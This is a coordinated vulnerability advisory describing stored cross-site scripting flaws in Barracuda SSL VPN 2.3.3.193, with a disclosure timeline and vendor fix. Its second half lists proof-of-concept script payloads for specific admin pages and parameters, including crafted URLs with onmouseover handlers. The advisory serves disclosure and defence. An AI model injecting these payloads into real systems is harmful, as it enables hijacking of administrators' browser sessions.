139 lines
No EOL
4.3 KiB
Text
139 lines
No EOL
4.3 KiB
Text
|
|
Barracuda SSL VPN 680Vx 2.3.3.193 Multiple Script Injection Vulnerabilities
|
|
|
|
|
|
Vendor: Barracuda Networks, Inc.
|
|
Product web page: https://www.barracuda.com
|
|
Affected version: 2.3.3.193, Model: V680
|
|
|
|
Summary: The Barracuda SSL VPN is a powerful plug-and-play appliance
|
|
purpose-built to provide remote users with secure access to internal
|
|
network resources.
|
|
|
|
Desc: Barracuda SSL VPN suffers from multiple stored XSS vulnerabilities
|
|
when parsing user input to several parameters via POST method. Attackers
|
|
can exploit these weaknesses to execute arbitrary HTML and script code in
|
|
a user's browser session.
|
|
|
|
Tested on: Linux 2.4.x, Jetty Web Server
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Vendor status:
|
|
|
|
[05.03.2013] Vulnerabilities discovered.
|
|
[16.03.2013] Contact with the vendor.
|
|
[17.03.2013] Vendor replies.
|
|
[19.03.2013] Working with the vendor.
|
|
[28.03.2013] Vendor confirms issues, track BNSEC-1239.
|
|
[15.04.2013] Asked vendor for status update.
|
|
[17.04.2013] Vendor replies.
|
|
[18.04.2013] Confirming that the issues are still present on the demo test sites. (v2.3.3.193)
|
|
[07.05.2013] Vendor informs that the version 2.3.3.216 since 13.03.2013 is patched from these issues.
|
|
[08.05.2013] Coordinating with the vendor.
|
|
[08.06.2013] Vendor confirms that as of firmware version 2.3.3.216 the issues have been resolved.
|
|
[01.07.2013] Coordinated public security advisory released.
|
|
|
|
|
|
|
|
Advisory ID: ZSL-2013-5147
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5147.php
|
|
|
|
Barracuda Labs: http://barracudalabs.com/?page_id=3456
|
|
http://barracudalabs.com/?page_id=3458
|
|
|
|
|
|
05.03.2013
|
|
|
|
--
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/showSystemConfiguration.do?categoryId=821
|
|
|
|
CRLs ADD: "><script>alert(1);</script>
|
|
|
|
Parameter: propertyItem[25].value
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/showAuditReports.do (Reports)
|
|
|
|
Username ADD: "><script>alert(1);</script>
|
|
|
|
Parameters: user
|
|
account
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/showSystemConfiguration.do?categoryId=14800
|
|
|
|
Files to Scan ADD: "><script>alert(1);</script>
|
|
Files to Exclude from Scanning ADD: "><script>alert(2);</script>
|
|
Files to Block ADD: "><script>alert(3);</script>
|
|
|
|
Parameters: propertyItem[1].value
|
|
propertyItem[2].value
|
|
propertyItem[3].value
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/showSystemConfiguration.do?categoryId=810
|
|
|
|
Public Internal Web Sites ADD: "><script>alert(1);</script>
|
|
VPN Port ADD: "><script>alert(2);</script>
|
|
|
|
Parameters: propertyItem[1].value
|
|
propertyItem[8].value
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/showAvailableAccounts.do
|
|
|
|
Available Groups ADD: "><script>alert(1);</script>
|
|
|
|
Parameter: selectedRoles
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit
|
|
|
|
Account ADD: "><script>alert(1);</script>
|
|
Group ADD: "><script>alert(2);</script>
|
|
Policy ADD: "><script>alert(3);</script>
|
|
|
|
Parameter: policy
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/editAccount.do?actionTarget=edit&username=guest&parent_name=edit
|
|
|
|
Available Groups ADD: "><script>alert(1);</script>
|
|
Authorized IP Addresses ADD: "><script>alert(2);</script>
|
|
Other Computers (Waks-On-LAN) ADD: "><script>alert(3);</script>
|
|
|
|
Parameters: selectedRoles
|
|
propertyItem[1].value
|
|
propertyItem[6].value
|
|
|
|
====================================================================================
|
|
|
|
|
|
https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit
|
|
https://server/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit
|
|
|
|
Group ADD: "><script>alert(1);</script>
|
|
|
|
Parameter: resourceName
|
|
|
|
==================================================================================== |